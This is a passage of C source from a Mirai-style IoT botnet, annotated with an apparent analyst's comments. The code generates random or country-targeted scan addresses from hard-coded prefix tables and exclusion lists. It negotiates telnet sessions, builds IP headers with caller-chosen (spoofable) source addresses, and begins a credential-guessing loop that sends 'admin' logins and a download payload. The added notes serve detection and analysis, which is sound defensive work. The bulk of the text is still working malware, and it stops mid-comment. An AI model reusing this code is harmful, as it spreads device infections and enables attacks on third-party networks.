          int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
          if (res < 0) {
                  if (errno == EINPROGRESS) {
                          tv.tv_sec = timeout;
                          tv.tv_usec = 0;
                          FD_ZERO(&myset);
                          FD_SET(fd, &myset);
                          // writable means the connect attempt has finished
                          if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
                                  lon = sizeof(int);
                                  // SO_ERROR tells whether it finished successfully
                                  getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
                                  if (valopt) return 0;
                          }
                          else return 0;
                  }
                  else return 0;
          }
          arg = fcntl(fd, F_GETFL, NULL);
          arg &= (~O_NONBLOCK);
          fcntl(fd, F_SETFL, arg);
          return 1;
  }
  /*
   * fork() and, in the parent, append the child's PID to the global pids
   * array (a new array is allocated, the old entries copied, the old array
   * freed). Returns the fork() result.
   *
   * The result is held in a uint32_t, so the `<= 0` test is true only for 0,
   * i.e. in the child. The malloc() result is not checked.
   */
  int listFork() {
          uint32_t parent, *newpids, i;
          parent = fork();
          if (parent <= 0) return parent;
          numpids++;
          newpids = (uint32_t*)malloc((numpids + 1) * 4);
          for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
          newpids[numpids - 1] = parent;
          free(pids);
          pids = newpids;
          return parent;
  }
  /*
   * Answer one telnet option-negotiation sequence held in buf, where buf[1]
   * is the command byte and buf[2] the option byte. For WILL, WONT, DO and
   * DONT three bytes are sent back: IAC, a reply command, and the option.
   * Other command bytes are ignored. `len` is not used. Always returns 0;
   * the results of send() are not checked.
   */
  int negotiate(int sock, unsigned char *buf, int len) {
          unsigned char c;
          switch (buf[1]) {
          case CMD_IAC: return 0;
          case CMD_WILL:
          case CMD_WONT:
          case CMD_DO:
          case CMD_DONT:
                  c = CMD_IAC;
                  send(sock, &c, 1, MSG_NOSIGNAL);
                  // choose the reply command
                  if (CMD_WONT == buf[1]) c = CMD_DONT;
                  else if (CMD_DONT == buf[1]) c = CMD_WONT;
                  else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
                  else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
                  send(sock, &c, 1, MSG_NOSIGNAL);
                  send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
                  break;
          default:
                  break;
          }
          return 0;
  }
  /*
   * Return 1 when the last character of bufStr that is not NUL, space, CR or
   * LF is one of the prompt characters ":>%$#", otherwise 0.
   * q counts backwards from the end of the string and starts at the
   * terminating NUL itself.
   */
  int matchPrompt(char *bufStr) {
          char *prompts = ":>%$#\0";
          int bufLen = strlen(bufStr);
          int i, q = 0;
          for(i = 0; i < strlen(prompts); i++) {
                  while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
                  if(*(bufStr + bufLen - q) == prompts[i]) return 1;
          }
          return 0;
  }
  735. uint8_t ipState[5] = {0};
  /*
   * Produce a pseudo-random IPv4 address (network byte order, as returned by
   * inet_addr()) and leave its octets in the global ipState. Octets are drawn
   * with rand() and redrawn while the address falls into one of the excluded
   * ranges tested below. Callers are outside this part of the file.
   *
   * Seen from the network, a host running this produces connection attempts
   * to unrelated, randomly chosen addresses, which is the pattern to look
   * for in flow data.
   */
  in_addr_t getRandomPublicIP() {
          ipState[0] = rand() % 223;
          ipState[1] = rand() % 255;
          ipState[2] = rand() % 255;
          ipState[3] = rand() % 255;
          while(
                  (ipState[0] == 0) ||
                  (ipState[0] == 10) ||
                  (ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) ||
                  (ipState[0] == 127) ||
                  (ipState[0] == 169 && ipState[1] == 254) ||
                  (ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) ||
                  (ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) ||
                  (ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) ||
                  (ipState[0] == 192 && ipState[1] == 168) ||
                  (ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) ||
                  (ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) ||
                  (ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) ||
                  (ipState[0] >= 224)
          )
          {
                  ipState[0] = rand() % 223;
                  ipState[1] = rand() % 255;
                  ipState[2] = rand() % 255;
                  ipState[3] = rand() % 255;
          }
          // render as dotted-quad text, then convert with inet_addr()
          char ip[16] = {0};
          szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
          return inet_addr(ip);
  }
/*
 * BCMSCAN - pick a scan target inside one of a fixed set of /16 prefixes.
 *
 * Analyst notes (malware sample; code left exactly as published):
 *  - The first two octets always come from the hard-coded table below; only
 *    the last two octets are random, each rand() % 255, i.e. 0..254.
 *  - randnum is rand() % 37, so it ranges over 0..36. Exactly one branch in
 *    that range matches on every call, which is why the uninitialised ip[]
 *    is always written before inet_addr() reads it. The `randnum == 37`
 *    branch can never be taken.
 *  - "37.11" appears at index 0 and index 10, so that prefix is selected
 *    twice as often as the others.
 *  - ipState[] is declared outside this function; elements 0 and 1 are
 *    randomised here but never used when formatting the address.
 *  - szprintf() is defined elsewhere in the file (presumably sprintf-like;
 *    confirm against its definition).
 *  - The prefix list is usable as-is for egress monitoring: a host that
 *    opens many TCP/23 connections spread across these prefixes matches the
 *    pattern driven by BCMscanner(), the caller of this function.
 *
 * Returns the chosen address as produced by inet_addr().
 */
in_addr_t BCMSCAN()
{
ipState[0] = 0;
ipState[1] = 0;
ipState[2] = 0;
ipState[3] = 0;
ipState[0] = rand() % 255;
ipState[1] = rand() % 255;
ipState[2] = rand() % 255;
ipState[3] = rand() % 255;
int randnum = rand() % 37; // 0..36: index into the prefix table below
char ip[16];
if(randnum == 0)
{
szprintf(ip, "37.11.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 1)
{
szprintf(ip, "146.158.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 2)
{
szprintf(ip, "185.4.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 3)
{
szprintf(ip, "188.76.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 4)
{
szprintf(ip, "188.77.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 5)
{
szprintf(ip, "188.78.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 6)
{
szprintf(ip, "188.79.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 7)
{
szprintf(ip, "212.106.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 8)
{
szprintf(ip, "212.9.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 9)
{
szprintf(ip, "213.179.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 10)
{
szprintf(ip, "37.11.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 11)
{
szprintf(ip, "37.132.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 12)
{
szprintf(ip, "37.133.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 13)
{
szprintf(ip, "37.134.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 14)
{
szprintf(ip, "37.135.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 15)
{
szprintf(ip, "37.14.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 16)
{
szprintf(ip, "37.15.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 17)
{
szprintf(ip, "37.35.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 18)
{
szprintf(ip, "37.97.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 19)
{
szprintf(ip, "62.14.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 20)
{
szprintf(ip, "87.216.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 21)
{
szprintf(ip, "87.217.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 22)
{
szprintf(ip, "87.218.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 23)
{
szprintf(ip, "87.219.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 24)
{
szprintf(ip, "87.220.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 25)
{
szprintf(ip, "87.221.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 26)
{
szprintf(ip, "87.222.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 27)
{
szprintf(ip, "87.223.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 28)
{
szprintf(ip, "90.94.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 29)
{
szprintf(ip, "92.191.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 30)
{
szprintf(ip, "95.16.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 31)
{
szprintf(ip, "95.17.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 32)
{
szprintf(ip, "95.18.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 33)
{
szprintf(ip, "95.19.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 34)
{
szprintf(ip, "95.20.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 35)
{
szprintf(ip, "95.21.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 36)
{
szprintf(ip, "95.22.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 37) // never true: rand() % 37 is at most 36
{
szprintf(ip, "95.23.%d.%d", ipState[2], ipState[3]);
}
return inet_addr(ip);
}
/*
 * PhoneScan - pick a scan target inside one of a fixed set of /16 prefixes.
 *
 * Analyst notes (malware sample; code left exactly as published):
 *  - Same construction as BCMSCAN() with a larger table: the first two
 *    octets are hard-coded, the last two are rand() % 255 each (0..254).
 *  - randnum is rand() % 117, so it ranges over 0..116. One branch in that
 *    range matches on every call, so ip[] is always written before
 *    inet_addr() reads it. The `randnum == 117` branch can never be taken.
 *  - Some prefixes repeat and are therefore weighted more heavily:
 *    119.157 (0 and 8), 152.241 (14 and 36), 182.185 (15 and 51).
 *  - ipState[] is declared outside this function; elements 0 and 1 are
 *    randomised here but never used when formatting the address.
 *  - Callers of PhoneScan() are outside this view.
 *  - The prefix list can be lifted directly into egress-monitoring rules.
 *
 * Returns the chosen address as produced by inet_addr().
 */
in_addr_t PhoneScan(){
ipState[0] = 0;
ipState[1] = 0;
ipState[2] = 0;
ipState[3] = 0;
ipState[0] = rand() % 255;
ipState[1] = rand() % 255;
ipState[2] = rand() % 255;
ipState[3] = rand() % 255;
int randnum = rand() % 117; // 0..116: index into the prefix table below
char ip[16];
if(randnum == 0)
{
szprintf(ip, "119.157.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 1)
{
szprintf(ip, "119.150.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 2)
{
szprintf(ip, "119.151.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 3)
{
szprintf(ip, "119.152.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 4)
{
szprintf(ip, "119.153.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 5)
{
szprintf(ip, "119.154.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 6)
{
szprintf(ip, "119.155.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 7)
{
szprintf(ip, "119.156.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 8)
{
szprintf(ip, "119.157.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 9)
{
szprintf(ip, "119.158.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 10)
{
szprintf(ip, "119.159.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 11)
{
szprintf(ip, "191.24.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 12)
{
szprintf(ip, "187.119.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 13)
{
szprintf(ip, "177.215.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 14)
{
szprintf(ip, "152.241.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 15)
{
szprintf(ip, "182.185.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 16)
{
szprintf(ip, "179.80.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 17)
{
szprintf(ip, "179.81.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 18)
{
szprintf(ip, "179.82.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 19)
{
szprintf(ip, "179.83.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 20)
{
szprintf(ip, "179.84.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 21)
{
szprintf(ip, "179.86.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 22)
{
szprintf(ip, "179.87.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 23)
{
szprintf(ip, "179.88.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 24)
{
szprintf(ip, "179.89.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 25)
{
szprintf(ip, "179.90.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 26)
{
szprintf(ip, "179.91.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 27)
{
szprintf(ip, "179.92.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 28)
{
szprintf(ip, "179.93.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 29)
{
szprintf(ip, "179.94.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 30)
{
szprintf(ip, "179.95.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 31)
{
szprintf(ip, "179.96.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 32)
{
szprintf(ip, "179.97.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 33)
{
szprintf(ip, "179.98.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 34)
{
szprintf(ip, "179.99.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 35)
{
szprintf(ip, "152.240.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 36)
{
szprintf(ip, "152.241.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 37)
{
szprintf(ip, "152.242.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 38)
{
szprintf(ip, "152.243.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 39)
{
szprintf(ip, "152.244.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 40)
{
szprintf(ip, "152.245.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 41)
{
szprintf(ip, "152.246.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 42)
{
szprintf(ip, "152.247.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 43)
{
szprintf(ip, "152.248.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 44)
{
szprintf(ip, "152.249.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 45)
{
szprintf(ip, "182.189.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 46)
{
szprintf(ip, "182.190.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 47)
{
szprintf(ip, "182.191.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 48)
{
szprintf(ip, "182.188.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 49)
{
szprintf(ip, "182.187.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 50)
{
szprintf(ip, "182.186.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 51)
{
szprintf(ip, "182.185.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 52)
{
szprintf(ip, "182.184.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 53)
{
szprintf(ip, "179.100.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 54)
{
szprintf(ip, "179.101.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 55)
{
szprintf(ip, "179.102.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 56)
{
szprintf(ip, "179.103.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 57)
{
szprintf(ip, "179.110.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 58)
{
szprintf(ip, "179.111.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 59)
{
szprintf(ip, "179.112.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 60)
{
szprintf(ip, "179.113.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 61)
{
szprintf(ip, "179.114.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 62)
{
szprintf(ip, "179.115.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 63)
{
szprintf(ip, "179.116.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 64)
{
szprintf(ip, "179.117.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 65)
{
szprintf(ip, "191.193.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 66)
{
szprintf(ip, "191.194.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 67)
{
szprintf(ip, "191.195.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 68)
{
szprintf(ip, "191.196.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 69)
{
szprintf(ip, "191.197.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 70)
{
szprintf(ip, "191.198.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 71)
{
szprintf(ip, "152.250.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 72)
{
szprintf(ip, "152.251.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 73)
{
szprintf(ip, "152.252.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 74)
{
szprintf(ip, "152.253.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 75)
{
szprintf(ip, "152.254.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 76)
{
szprintf(ip, "152.255.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 77)
{
szprintf(ip, "177.112.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 78)
{
szprintf(ip, "177.113.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 79)
{
szprintf(ip, "177.114.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 80)
{
szprintf(ip, "177.115.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 81)
{
szprintf(ip, "177.116.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 82)
{
szprintf(ip, "177.117.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 83)
{
szprintf(ip, "177.118.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 84)
{
szprintf(ip, "177.119.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 85)
{
szprintf(ip, "177.120.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 86)
{
szprintf(ip, "177.121.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 87)
{
szprintf(ip, "177.138.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 88)
{
szprintf(ip, "177.139.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 89)
{
szprintf(ip, "177.144.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 90)
{
szprintf(ip, "177.145.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 91)
{
szprintf(ip, "177.146.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 92)
{
szprintf(ip, "177.147.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 93)
{
szprintf(ip, "177.160.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 94)
{
szprintf(ip, "177.161.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 95)
{
szprintf(ip, "177.162.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 96)
{
szprintf(ip, "177.163.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 97)
{
szprintf(ip, "177.168.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 98)
{
szprintf(ip, "177.169.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 99)
{
szprintf(ip, "177.170.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 100)
{
szprintf(ip, "177.171.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 101)
{
szprintf(ip, "177.172.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 102)
{
szprintf(ip, "189.96.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 103)
{
szprintf(ip, "189.97.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 104)
{
szprintf(ip, "189.98.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 105)
{
szprintf(ip, "189.99.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 106)
{
szprintf(ip, "39.34.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 107)
{
szprintf(ip, "59.103.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 108)
{
szprintf(ip, "191.12.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 109)
{
szprintf(ip, "186.117.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 110)
{
szprintf(ip, "179.131.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 111)
{
szprintf(ip, "179.129.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 112)
{
szprintf(ip, "179.170.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 113)
{
szprintf(ip, "191.206.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 114)
{
szprintf(ip, "187.118.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 115)
{
szprintf(ip, "187.116.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 116)
{
szprintf(ip, "179.224.%d.%d", ipState[2], ipState[3]);
}
if(randnum == 117) // never true: rand() % 117 is at most 116
{
szprintf(ip, "179.166.%d.%d", ipState[2], ipState[3]);
}
return inet_addr(ip);
}
/*
 * MiraiIPRanges - draw random IPv4 addresses until one falls outside an
 * exclusion list, then return it.
 *
 * Analyst notes (malware sample; code left exactly as published):
 *  - One rand_cmwc() value is split into four octets, low byte first
 *    (o1 = bits 0..7). The loop repeats while the octets match any entry of
 *    the exclusion list in the while-condition.
 *  - Several of the author's range labels do not describe what the condition
 *    actually tests; the per-line comments below state the tested range and
 *    keep the original label. This matters when predicting which networks a
 *    running sample will and will not probe.
 *  - Organisation names are the original author's labels, not verified here.
 *  - ip[] is formatted but not used afterwards; the return value comes from
 *    the INET_ADDR macro, which applies htonl() with o1 as the first octet.
 */
static ipv4_t MiraiIPRanges(void)
{
    uint32_t tmp;
    uint8_t o1, o2, o3, o4;
    do
    {
        tmp = rand_cmwc();
        o1 = tmp & 0xff;
        o2 = (tmp >> 8) & 0xff;
        o3 = (tmp >> 16) & 0xff;
        o4 = (tmp >> 24) & 0xff;
    }
    while (o1 == 127 ||                             // 127.0.0.0/8      - Loopback
          (o1 == 0) ||                              // 0.0.0.0/8        - Invalid address space
          (o1 == 3) ||                              // 3.0.0.0/8        - General Electric Company
          (o1 == 15 || o1 == 16) ||                 // tests 15.0.0.0/8 and 16.0.0.0/8 (original label: 15.0.0.0/7 - Hewlett-Packard Company)
          (o1 == 56) ||                             // 56.0.0.0/8       - US Postal Service
          (o1 == 10) ||                             // 10.0.0.0/8       - Internal network
          (o1 == 192 && o2 == 168) ||               // 192.168.0.0/16   - Internal network
          (o1 == 172 && o2 >= 16 && o2 < 32) ||     // tests 172.16.0.0/12 (original label: 172.16.0.0/14 - Internal network)
          (o1 == 100 && o2 >= 64 && o2 < 127) ||    // tests 100.64.x.x-100.126.x.x; 100.127.x.x is not excluded (original label: 100.64.0.0/10 - IANA NAT reserved)
          (o1 == 169 && o2 > 254) ||                // tests only 169.255.x.x; 169.254.0.0/16 is not excluded (original label: 169.254.0.0/16 - IANA NAT reserved)
          (o1 == 198 && o2 >= 18 && o2 < 20) ||     // 198.18.0.0/15    - IANA Special use
          (o1 >= 224) ||                            // 224.*.*.*+       - Multicast
          (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
    );
char ip[16];
szprintf(ip, "%d.%d.%d.%d", o1,  o2, o3, o4); // dotted-quad string is built but never read
return INET_ADDR(o1,o2,o3,o4);
}
// Selector consulted by findARandomIP(); initialised to 1. Whether anything
// else in the file changes it is not visible from here.
int rangechoice = 1;
/*
 * findARandomIP - return the next scan target for TelnetScanner().
 *
 * Analyst note: every branch below ends in the same call,
 * getRandomPublicIP(), so the value of rangechoice has no effect on the
 * result as published. BCMSCAN(), PhoneScan() and MiraiIPRanges() are not
 * reachable through this function.
 */
in_addr_t findARandomIP()
{
if(rangechoice < 1 || rangechoice > 2)
{
return getRandomPublicIP();
}
else
{
if(rangechoice == 1){
return getRandomPublicIP();
}
else if(rangechoice == 2)
{
return getRandomPublicIP();
}
else
{
return getRandomPublicIP();
}
}
}
/*
 * getRandomIP - build an address that shares the bot's own network bits.
 *
 * The bits of ourIP selected by netmask are kept (after ntohl(), so in host
 * byte order) and the remaining bits are filled from rand_cmwc(). No htonl()
 * is applied here, so the value is returned as computed in host order.
 * ourIP and rand_cmwc() are defined elsewhere in the file; how callers use
 * the result is not visible from here.
 */
in_addr_t getRandomIP(in_addr_t netmask) {
        in_addr_t tmp = ntohl(ourIP.s_addr) & netmask; // network part of our own address
        return tmp ^ ( rand_cmwc() & ~netmask);        // random host part (XOR acts as OR: the bit sets are disjoint)
}
/*
 * csum - 16-bit one's-complement checksum over `count` bytes at `buf`.
 *
 * Whole 16-bit words are summed as stored in memory; a trailing odd byte is
 * added unshifted. Carries above bit 15 are folded back in until none remain,
 * and the complement of the folded sum is returned.
 */
unsigned short csum (unsigned short *buf, int count) {
        uint64_t acc = 0;
        const unsigned short *word = buf;
        int remaining = count;

        /* sum every complete 16-bit word */
        for (; remaining > 1; remaining -= 2) {
                acc += *word++;
        }

        /* one byte left over: add the first byte in memory as-is */
        if (remaining > 0) {
                acc += *(const unsigned char *)word;
        }

        /* fold carries back into the low 16 bits */
        while ((acc >> 16) != 0) {
                acc = (acc >> 16) + (acc & 0xffff);
        }

        return (uint16_t)(~acc);
}
/*
 * tcpcsum - checksum a TCP header together with a locally built
 * pseudo-header taken from the IP header's addresses.
 *
 * Analyst notes (malware sample; code left exactly as published):
 *  - The pseudo-header length field is fixed at sizeof(struct tcphdr), so
 *    only the bare TCP header is covered; no options or payload are included.
 *  - The address fields are declared `unsigned long`, so the size and layout
 *    of struct tcp_pseudo depend on the ABI the sample was built for, and the
 *    struct is never zeroed, so any padding is copied as-is.
 *    NOTE(review): checksums emitted by different builds may therefore differ
 *    and may not validate; check captures, since that would be a usable
 *    traffic fingerprint.
 *  - total_len is read from the IP header but never used.
 *  - The malloc() result is used without a NULL check.
 *
 * Returns the value produced by csum() over the concatenated buffer.
 */
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
        struct tcp_pseudo {
                unsigned long src_addr;
                unsigned long dst_addr;
                unsigned char zero;
                unsigned char proto;
                unsigned short length;
        } pseudohead;
        unsigned short total_len = iph->tot_len; // unused below
        pseudohead.src_addr=iph->saddr;
        pseudohead.dst_addr=iph->daddr;
        pseudohead.zero=0;
        pseudohead.proto=IPPROTO_TCP;
        pseudohead.length=htons(sizeof(struct tcphdr)); // header only
        int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
        unsigned short *tcp = malloc(totaltcp_len);
        // scratch buffer layout: [pseudo-header][TCP header]
        memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
        memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
        unsigned short output = csum(tcp,totaltcp_len);
        free(tcp);
        return output;
}
/*
 * makeIPPacket - fill in an IPv4 header in place.
 *
 * iph        header to populate
 * dest       destination address, stored as given
 * source     source address, stored as given
 * protocol   value for the IP protocol field
 * packetSize number of bytes that follow the IP header
 *
 * Analyst notes: the source address is whatever the caller passes, so the
 * header is not tied to the sending host's real address; egress filtering
 * (BCP 38) at the network edge is the control that catches that case.
 * The checksum field is left at 0 for a later step outside this function,
 * and tot_len is stored without htons().
 */
void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize) {
        iph->ihl = 5;           // 5 x 32-bit words: 20-byte header, no options
        iph->version = 4;
        iph->tos = 0;
        iph->tot_len = sizeof(struct iphdr) + packetSize;
        iph->id = rand_cmwc();  // random identification value per header
        iph->frag_off = 0;
        iph->ttl = MAXTTL;
        iph->protocol = protocol;
        iph->check = 0;
        iph->saddr = source;
        iph->daddr = dest;
}
/*
 * sclose - close a descriptor, refusing anything below 3.
 *
 * Returns 1 without touching the descriptor when fd is 0, 1, 2 or negative;
 * otherwise closes it and returns 0. The result of close() is not inspected.
 */
int sclose(int fd) {
        const int is_protected = (fd < 3);

        if (is_protected) {
                return 1;
        }

        close(fd);
        return 0;
}
/*
 * BCMscanner - telnet credential-guessing loop over addresses from BCMSCAN().
 *
 * Analyst notes (malware sample; code left exactly as published):
 *  - Runs forever over 312 connection slots (struct telstate_t, defined
 *    elsewhere). Each slot is a small state machine, advanced one step per
 *    pass of the outer loop:
 *      0  choose target, start non-blocking connect to TCP/23
 *      1  wait for the connect to finish
 *      2  read until a prompt matches
 *      3  send "admin\r\n"
 *      4  read until a prompt matches
 *      5  send "admin\r\n"
 *      6  read the post-login response; report to the C2 socket on success
 *      7  send clean-up / process-kill commands and the download payload
 *  - All slots point at the same 313-byte heap buffer (sockbuf).
 *  - phone, advances2, contains_fail(), read_until_response(), sockprintf(),
 *    get_telstate_host(), reset_telstate(), RemoveTempDirs(), mainCommSock,
 *    Telnet_Usernames, Telnet_Passwords, Temp_Directorys, Bot_Killer_Binarys
 *    and Busybox_Payload are all defined outside this function.
 *  - Detection: a device that opens hundreds of short-lived outbound TCP/23
